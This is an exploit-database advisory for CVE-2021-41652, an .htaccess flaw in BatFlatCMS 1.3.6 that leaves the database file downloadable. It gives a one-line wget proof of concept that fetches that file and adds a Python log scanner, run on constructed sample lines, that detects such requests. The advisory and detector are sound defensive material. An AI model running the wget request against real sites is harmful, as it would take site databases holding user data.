## https://sploitus.com/exploit?id=78B3A360-1478-57D7-A33C-F65167B7D6E7
# CVE-2021-41652

### Description:

An incorrect access rule in the `.htaccess` file of BatFlatCMS v1.3.6 allows direct access to the database file (`database.sdb`).

### Proof of concept:

`wget http://localhost/inc/data/database.sdb`
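To check whether the database file was already requested from a deployment, the following added example (not part of the original advisory or the BatFlat project) scans Apache access-log lines for requests to the path shown above. The log format (Apache common/combined), the function names and the sample lines are assumptions made for this illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Path from the advisory's proof of concept; BatFlat may be installed in a subdirectory.
DB_SUFFIX = "/inc/data/database.sdb"
SERVED = {"200", "206"}  # full or ranged response: file content left the server

# Apache common/combined log prefix: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def normalise(target):
    """Strip the query string and undo percent-encoding, '//' and '/./' before matching."""
    path = unquote(target.split("?", 1)[0].split("#", 1)[0])
    path = re.sub(r"/+", "/", path)
    return posixpath.normpath(path).lower()

def find_database_requests(lines):
    """Return (served, probed): requests for the database file, split by outcome."""
    served, probed = [], []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not normalise(m["target"]).endswith(DB_SUFFIX):
            continue
        hit = {"host": m["host"], "time": m["time"], "status": m["status"],
               "bytes": 0 if m["size"] == "-" else int(m["size"])}
        (served if m["status"] in SERVED else probed).append(hit)
    return served, probed

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Oct/2021:10:01:22 +0000] "GET /inc/data/database.sdb HTTP/1.1" 200 118784 "-" "Wget/1.20.3"',
    '198.51.100.4 - - [12/Oct/2021:10:05:10 +0000] "GET /cms//inc/./data/%64atabase.sdb?x=1 HTTP/1.1" 206 4096 "-" "curl/7.68.0"',
    '192.0.2.9 - - [13/Oct/2021:08:00:00 +0000] "GET /inc/data/database.sdb HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [13/Oct/2021:08:00:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    served, probed = find_database_requests(SAMPLE_LOG)
    for hit in served:
        print("SERVED", hit)
    for hit in probed:
        print("blocked/probed", hit)
```

An entry in the first list means the server sent file content to that client; entries in the second list were requests that did not receive it.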

### References:

- [https://leobreaker1411.github.io/blog/cve-2021-41652](https://leobreaker1411.github.io/blog/cve-2021-41652)
- [https://www.cve.org/CVERecord?id=CVE-2021-41652](https://www.cve.org/CVERecord?id=CVE-2021-41652)
- [Fixed Commit](https://github.com/sruupl/batflat/commit/9211d84406d63c575b079619137aff74b67cd344)
- [BatFlat Docs](https://batflat.org/docs)